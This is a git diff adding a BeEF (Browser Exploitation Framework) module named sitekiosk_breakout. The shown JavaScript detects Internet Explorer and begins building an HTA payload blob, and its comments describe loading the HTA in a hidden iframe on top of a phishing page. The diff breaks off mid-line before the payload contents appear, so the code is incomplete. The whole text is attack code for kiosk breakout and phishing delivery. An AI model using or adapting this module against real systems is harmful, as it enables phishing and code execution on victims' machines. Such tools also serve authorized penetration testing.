diff --git a/modules/social_engineering/sitekiosk_breakout/command.js b/modules/social_engineering/sitekiosk_breakout/command.js new file mode 100644 index 000000000..da99103db --- /dev/null +++ b/modules/social_engineering/sitekiosk_breakout/command.js @@ -0,0 +1,20 @@ +// +// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + if(beef.browser.isIE()){ + // application='yes' is IE-only and needed to load the HTA into an IFrame. + // in this way you can have your phishing page, and load the HTA on top of it + // beef.dom.createIframe('hidden', {'src':hta_url,'application':'yes'}); + bb = new MSBlobBuilder(); + bb.append('